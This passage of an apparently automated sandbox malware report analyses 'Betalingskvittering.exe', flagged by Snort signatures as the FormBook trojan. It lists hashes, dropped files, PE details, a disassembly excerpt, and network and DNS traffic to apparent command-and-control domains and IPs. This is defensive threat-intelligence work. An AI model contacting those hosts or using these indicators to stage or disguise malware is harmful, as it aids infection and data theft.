                                                      uu5009125.exeGet hashmaliciousBrowse
                                                      • 192.0.78.24
                                                      mmhr56001.exeGet hashmaliciousBrowse
                                                      • 192.0.78.24
                                                      afTyhpBvrtJlTWH.exeGet hashmaliciousBrowse
                                                      • 192.0.78.25
                                                      TDCKZy88Av.exeGet hashmaliciousBrowse
                                                      • 192.0.78.24
                                                      hoho.x86Get hashmaliciousBrowse
                                                      • 87.250.173.253
                                                      4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22
                                                      74BAFD56C1FB3CDEBF0A63DE4FFB6F16DC1D5CEE38E11.exeGet hashmaliciousBrowse
                                                      • 74.114.154.22

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\i7pwu380h7n
                                                      Process:C:\Users\user\Desktop\Betalingskvittering.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):215215
                                                      Entropy (8bit):7.992329094749247
                                                      Encrypted:true
                                                      SSDEEP:3072:eA5GQGC4njU2psXYtX3gPJJwjNsG+t4bgIVvJvbBywA6jptYemg8fiz/jBKJMS5E:TGQGC4nXpsXe3gQjVJvJvbBy6vtmgmCz
                                                      MD5:C5A456DA3811B77C89383F30A05D56FA
                                                      SHA1:FE6C5EDC9EEDF65268B6F4E0DBEDDC68DE167026
                                                      SHA-256:0ADF70BEEE33A271CEF0F2E00F1A1B64F3219BB5464EE837E13FA95470BD351C
                                                      SHA-512:27E1ED54D2F889F4F7075351DF49B1C9307F3879A8924BED7C47B91361D318242E0E62CB022FF6DD94C805FC83AC1796F856FDCC0AA956D1824509DEB531FD70
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: ;.q..........u...|.!O.)......h(.$auSz...ML.p..BY%.[...;...zd*....P...w...g].C.BQ.a....X.r.X(h.)..t2...:..1.#poHL............._...........4;$..pZ.J%.>.....'N.Cye....F.+..;........X.H..51rIW.c,.........v.QN....E.!bHcc...>.r.]...1.U.._.+.FZ.Qp..#A.p2p.%..:......V.....m.....G...Vp.h(.$-uSZ...ML.W..BY%.[...;...z.*.,b.6.<...|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o.7..L....._HcIn1..3.c......B..vb,.Y....!bHcc..f%.r.7...wU....+#FZ..p.O#..p2p.,..:.........|..m...P.....Vp0h(.$auSz...ML.p..BY%.[...;...z.*.,b.6.<...|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o......._/.Hc.n1..g.c,......B..vb,....E.!bHcc..f%.r.7...wU....+#FZ..p.O#..p2p.,..:.........|..m...P.....Vp0h(.$auSz...ML.p..BY%.[...;...z.*.,b.6.<...|c.h.`...(.h.OS....F(./..R%.1[...Ca.P...Cx.............?=....r@...../..L}{.T........z_....?.o......._/.Hc.n1..g.c,......B..vb,....E.!bHcc..f%.r.7..
                                                      C:\Users\user\AppData\Local\Temp\nspE572.tmp\nkcyodylqw.dll
                                                      Process:C:\Users\user\Desktop\Betalingskvittering.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):20992
                                                      Entropy (8bit):6.655068942176116
                                                      Encrypted:false
                                                      SSDEEP:384:UwOO8o3orkAkGZWeEqhEPVBNyzFhDYjrUYDo7NubnRTHX25uCcxtJsIvb:Fdz3orwGZWpPIkjnoJCB25atJsy
                                                      MD5:5F44E4E9F9FE113F0D1AB278DC89EAD8
                                                      SHA1:B7C72FDC24D4D131D387784E8D88D1ADED4DDCDB
                                                      SHA-256:0EE64FC9C60DA614EA871B861A9527EEB9B77FA765A87748DE28B62766033A90
                                                      SHA-512:AFB85AD0FF22059132EF4A6EEF96B17F7A452DF32565F73156935604AB559608748BD856B3129B6973C5DEDB1BC85582942D9E2587B80F2A667281011C1D65D7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ *..ADH.ADH.ADH/.H.ADHY^@H.ADH2]JH.ADHY^NH.ADH.*EI.ADH.AEH.ADH&.@I.ADH&.DI.ADH#..H.ADH&.FI.ADHRich.ADH................PE..L.....ya...........!.....$...*...............@............................................@.........................pA..H....C.......p..............................PA...............................................@...............................text....#.......$.................. ..`.rdata..R....@.......(..............@..@.data...d....P.......2..............@....rsrc........p.......L..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.45883386860137
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Betalingskvittering.exe
                                                      File size:334436
                                                      MD5:ff904170ad5767db6b6066400972cc99
                                                      SHA1:ae326e46c0a7649659faca436ddefc232f3f18d7
                                                      SHA256:ee4b441c93ac2eb13f0cc02b060836e8538fa08bc434cf8b87552f820dc8563e
                                                      SHA512:eadc3aa0abd94c4ae1f9bcc3e0780faad6d8065b7c2f19f804e37dea1efc2332d55a9d24ee01a258192751ff31a8eebe02edf463c8c588c5db1db33e727646c8
                                                      SSDEEP:6144:VBlL/kE286EZdSbHptGXIwQhtgaDvepziyGiKR1Y0f0/R2:D6E2864SqBQhtgHpaiuY0c/Y
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                      File Icon

                                                      Icon Hash:ccccccd2c0d0f834

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4030fb
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov dword ptr [esp+14h], 00409168h
                                                      mov dword ptr [esp+1Ch], ebx
                                                      mov byte ptr [esp+18h], 00000020h
                                                      call dword ptr [004070B0h]
                                                      call dword ptr [004070ACh]
                                                      cmp ax, 00000006h
                                                      je 00007FDB84D64D23h
                                                      push ebx
                                                      call 00007FDB84D67B04h
                                                      cmp eax, ebx
                                                      je 00007FDB84D64D19h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 00407280h
                                                      push esi
                                                      call 00007FDB84D67A80h
                                                      push esi
                                                      call dword ptr [00407108h]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007FDB84D64CFDh
                                                      push 0000000Dh
                                                      call 00007FDB84D67AD8h
                                                      push 0000000Bh
                                                      call 00007FDB84D67AD1h
                                                      mov dword ptr [00423F44h], eax
                                                      call dword ptr [00407038h]
                                                      push ebx
                                                      call dword ptr [0040726Ch]
                                                      mov dword ptr [00423FF8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0041F4F0h
                                                      call dword ptr [0040715Ch]
                                                      push 0040915Ch
                                                      push 00423740h
                                                      call 00007FDB84D67704h
                                                      call dword ptr [0040710Ch]
                                                      mov ebp, 0042A000h
                                                      push eax
                                                      push ebp
                                                      call 00007FDB84D676F2h
                                                      push ebx
                                                      call dword ptr [00407144h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x14a90.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .rsrc0x2d0000x14a900x14c00False0.15813253012data4.80548061536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0x2d2200x10828dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                      RT_ICON0x3da480x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 50331648, next used block 50331648EnglishUnited States
                                                      RT_ICON0x3fff00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 134217728, next used block 134217728EnglishUnited States
                                                      RT_ICON0x410980x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                      RT_DIALOG0x415000x100dataEnglishUnited States
                                                      RT_DIALOG0x416000x11cdataEnglishUnited States
                                                      RT_DIALOG0x417200x60dataEnglishUnited States
                                                      RT_GROUP_ICON0x417800x3edataEnglishUnited States
                                                      RT_MANIFEST0x417c00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      10/27/21-17:50:36.225481TCP1201ATTACK-RESPONSES 403 Forbidden804976234.102.136.180192.168.2.6
                                                      10/27/21-17:50:47.258802TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.635.186.238.101
                                                      10/27/21-17:50:47.258802TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.635.186.238.101
                                                      10/27/21-17:50:47.258802TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.635.186.238.101
                                                      10/27/21-17:50:47.373639TCP1201ATTACK-RESPONSES 403 Forbidden804979635.186.238.101192.168.2.6
                                                      10/27/21-17:51:02.783266TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.6192.0.78.25
                                                      10/27/21-17:51:02.783266TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.6192.0.78.25
                                                      10/27/21-17:51:02.783266TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980280192.168.2.6192.0.78.25
                                                      10/27/21-17:51:18.402850TCP1201ATTACK-RESPONSES 403 Forbidden804983323.227.38.74192.168.2.6
                                                      10/27/21-17:51:29.023748TCP1201ATTACK-RESPONSES 403 Forbidden804983534.102.136.180192.168.2.6
                                                      10/27/21-17:51:34.243394TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.6198.54.117.217
                                                      10/27/21-17:51:34.243394TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.6198.54.117.217
                                                      10/27/21-17:51:34.243394TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983680192.168.2.6198.54.117.217

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 27, 2021 17:50:36.028481007 CEST4976280192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:50:36.047116995 CEST804976234.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:50:36.047293901 CEST4976280192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:50:36.047425985 CEST4976280192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:50:36.066009045 CEST804976234.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:50:36.225481033 CEST804976234.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:50:36.225509882 CEST804976234.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:50:36.225745916 CEST4976280192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:50:36.225925922 CEST4976280192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:50:36.244501114 CEST804976234.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:50:41.400573015 CEST4979080192.168.2.650.87.176.30
                                                      Oct 27, 2021 17:50:41.558836937 CEST804979050.87.176.30192.168.2.6
                                                      Oct 27, 2021 17:50:41.559036970 CEST4979080192.168.2.650.87.176.30
                                                      Oct 27, 2021 17:50:42.019907951 CEST4979080192.168.2.650.87.176.30
                                                      Oct 27, 2021 17:50:42.181401968 CEST804979050.87.176.30192.168.2.6
                                                      Oct 27, 2021 17:50:42.196352959 CEST804979050.87.176.30192.168.2.6
                                                      Oct 27, 2021 17:50:42.196461916 CEST804979050.87.176.30192.168.2.6
                                                      Oct 27, 2021 17:50:42.196649075 CEST4979080192.168.2.650.87.176.30
                                                      Oct 27, 2021 17:50:42.196743011 CEST4979080192.168.2.650.87.176.30
                                                      Oct 27, 2021 17:50:42.363377094 CEST804979050.87.176.30192.168.2.6
                                                      Oct 27, 2021 17:50:47.241719007 CEST4979680192.168.2.635.186.238.101
                                                      Oct 27, 2021 17:50:47.258548975 CEST804979635.186.238.101192.168.2.6
                                                      Oct 27, 2021 17:50:47.258651018 CEST4979680192.168.2.635.186.238.101
                                                      Oct 27, 2021 17:50:47.258801937 CEST4979680192.168.2.635.186.238.101
                                                      Oct 27, 2021 17:50:47.275650024 CEST804979635.186.238.101192.168.2.6
                                                      Oct 27, 2021 17:50:47.373639107 CEST804979635.186.238.101192.168.2.6
                                                      Oct 27, 2021 17:50:47.373675108 CEST804979635.186.238.101192.168.2.6
                                                      Oct 27, 2021 17:50:47.373944998 CEST4979680192.168.2.635.186.238.101
                                                      Oct 27, 2021 17:50:47.373975992 CEST4979680192.168.2.635.186.238.101
                                                      Oct 27, 2021 17:50:47.392800093 CEST804979635.186.238.101192.168.2.6
                                                      Oct 27, 2021 17:51:02.766233921 CEST4980280192.168.2.6192.0.78.25
                                                      Oct 27, 2021 17:51:02.782985926 CEST8049802192.0.78.25192.168.2.6
                                                      Oct 27, 2021 17:51:02.783132076 CEST4980280192.168.2.6192.0.78.25
                                                      Oct 27, 2021 17:51:02.783266068 CEST4980280192.168.2.6192.0.78.25
                                                      Oct 27, 2021 17:51:02.800074100 CEST8049802192.0.78.25192.168.2.6
                                                      Oct 27, 2021 17:51:02.800110102 CEST8049802192.0.78.25192.168.2.6
                                                      Oct 27, 2021 17:51:02.800127983 CEST8049802192.0.78.25192.168.2.6
                                                      Oct 27, 2021 17:51:02.800373077 CEST4980280192.168.2.6192.0.78.25
                                                      Oct 27, 2021 17:51:02.800421953 CEST4980280192.168.2.6192.0.78.25
                                                      Oct 27, 2021 17:51:02.817065954 CEST8049802192.0.78.25192.168.2.6
                                                      Oct 27, 2021 17:51:07.856880903 CEST4981580192.168.2.6104.21.40.182
                                                      Oct 27, 2021 17:51:07.873847008 CEST8049815104.21.40.182192.168.2.6
                                                      Oct 27, 2021 17:51:07.874011993 CEST4981580192.168.2.6104.21.40.182
                                                      Oct 27, 2021 17:51:07.874152899 CEST4981580192.168.2.6104.21.40.182
                                                      Oct 27, 2021 17:51:07.890993118 CEST8049815104.21.40.182192.168.2.6
                                                      Oct 27, 2021 17:51:07.902292013 CEST8049815104.21.40.182192.168.2.6
                                                      Oct 27, 2021 17:51:07.902440071 CEST8049815104.21.40.182192.168.2.6
                                                      Oct 27, 2021 17:51:07.903105021 CEST4981580192.168.2.6104.21.40.182
                                                      Oct 27, 2021 17:51:07.903229952 CEST4981580192.168.2.6104.21.40.182
                                                      Oct 27, 2021 17:51:07.920156956 CEST8049815104.21.40.182192.168.2.6
                                                      Oct 27, 2021 17:51:12.947541952 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:12.964684010 CEST8049829104.21.45.211192.168.2.6
                                                      Oct 27, 2021 17:51:12.964869022 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:12.964931965 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:12.981929064 CEST8049829104.21.45.211192.168.2.6
                                                      Oct 27, 2021 17:51:13.296627045 CEST8049829104.21.45.211192.168.2.6
                                                      Oct 27, 2021 17:51:13.296674967 CEST8049829104.21.45.211192.168.2.6
                                                      Oct 27, 2021 17:51:13.296896935 CEST8049829104.21.45.211192.168.2.6
                                                      Oct 27, 2021 17:51:13.296945095 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:13.297085047 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:13.297097921 CEST4982980192.168.2.6104.21.45.211
                                                      Oct 27, 2021 17:51:18.343540907 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.360551119 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.360698938 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.361021996 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.378016949 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.402849913 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.402892113 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.402937889 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.402976036 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.403033972 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.403062105 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.403094053 CEST804983323.227.38.74192.168.2.6
                                                      Oct 27, 2021 17:51:18.403100967 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.403274059 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.403326988 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:18.403382063 CEST4983380192.168.2.623.227.38.74
                                                      Oct 27, 2021 17:51:23.473524094 CEST4983480192.168.2.6142.4.98.67
                                                      Oct 27, 2021 17:51:23.665164948 CEST8049834142.4.98.67192.168.2.6
                                                      Oct 27, 2021 17:51:23.665296078 CEST4983480192.168.2.6142.4.98.67
                                                      Oct 27, 2021 17:51:23.665467978 CEST4983480192.168.2.6142.4.98.67
                                                      Oct 27, 2021 17:51:23.857815981 CEST8049834142.4.98.67192.168.2.6
                                                      Oct 27, 2021 17:51:23.857836962 CEST8049834142.4.98.67192.168.2.6
                                                      Oct 27, 2021 17:51:23.857845068 CEST8049834142.4.98.67192.168.2.6
                                                      Oct 27, 2021 17:51:23.858146906 CEST4983480192.168.2.6142.4.98.67
                                                      Oct 27, 2021 17:51:23.858237028 CEST4983480192.168.2.6142.4.98.67
                                                      Oct 27, 2021 17:51:24.049973011 CEST8049834142.4.98.67192.168.2.6
                                                      Oct 27, 2021 17:51:28.889132977 CEST4983580192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:51:28.907830954 CEST804983534.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:51:28.908083916 CEST4983580192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:51:28.908404112 CEST4983580192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:51:28.927047014 CEST804983534.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:51:29.023747921 CEST804983534.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:51:29.023803949 CEST804983534.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:51:29.024002075 CEST4983580192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:51:29.024163008 CEST4983580192.168.2.634.102.136.180
                                                      Oct 27, 2021 17:51:29.042787075 CEST804983534.102.136.180192.168.2.6
                                                      Oct 27, 2021 17:51:34.066029072 CEST4983680192.168.2.6198.54.117.217
                                                      Oct 27, 2021 17:51:34.237325907 CEST8049836198.54.117.217192.168.2.6
                                                      Oct 27, 2021 17:51:34.240775108 CEST4983680192.168.2.6198.54.117.217

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 27, 2021 17:50:36.000176907 CEST6034253192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:50:36.021222115 CEST53603428.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:50:41.238684893 CEST5606153192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:50:41.348360062 CEST53560618.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:50:47.205265045 CEST5378153192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:50:47.240438938 CEST53537818.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:50:52.420171976 CEST5406453192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:50:52.457309961 CEST53540648.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:50:57.472321033 CEST5529953192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:50:57.676028967 CEST53552998.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:02.743771076 CEST6374553192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:02.764975071 CEST53637458.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:07.832869053 CEST5005553192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:07.855567932 CEST53500558.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:12.921547890 CEST6137453192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:12.946542025 CEST53613748.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:18.308892012 CEST5033953192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:18.341314077 CEST53503398.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:23.449269056 CEST6330753192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:23.471781969 CEST53633078.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:28.868838072 CEST4969453192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:28.887815952 CEST53496948.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:34.040726900 CEST5498253192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:34.064815044 CEST53549828.8.8.8192.168.2.6
                                                      Oct 27, 2021 17:51:44.740894079 CEST5001053192.168.2.68.8.8.8
                                                      Oct 27, 2021 17:51:44.793246984 CEST53500108.8.8.8192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Oct 27, 2021 17:50:36.000176907 CEST192.168.2.68.8.8.80xfc7cStandard query (0)www.bobazzing.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:41.238684893 CEST192.168.2.68.8.8.80x6a6cStandard query (0)www.improvfilmproduction.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:47.205265045 CEST192.168.2.68.8.8.80xfd5eStandard query (0)www.olympiaapartment.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:52.420171976 CEST192.168.2.68.8.8.80x68d0Standard query (0)www.chimichael.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:50:57.472321033 CEST192.168.2.68.8.8.80x3cfaStandard query (0)www.tucows.websiteA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:02.743771076 CEST192.168.2.68.8.8.80x783eStandard query (0)www.malatirada.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:07.832869053 CEST192.168.2.68.8.8.80x88adStandard query (0)www.finansresultation.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:12.921547890 CEST192.168.2.68.8.8.80xf537Standard query (0)www.rxgmarket.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:18.308892012 CEST192.168.2.68.8.8.80xeab8Standard query (0)www.joystoreworld.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:23.449269056 CEST192.168.2.68.8.8.80xfe2fStandard query (0)www.bbyyn10.xyzA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:28.868838072 CEST192.168.2.68.8.8.80x9ce2Standard query (0)www.inkedbreadcompany.comA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:34.040726900 CEST192.168.2.68.8.8.80x941cStandard query (0)www.insularrofioa.xyzA (IP address)IN (0x0001)
                                                      Oct 27, 2021 17:51:44.740894079 CEST192.168.2.68.8.8.80x6f8Standard query (0)www.redeyeops.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
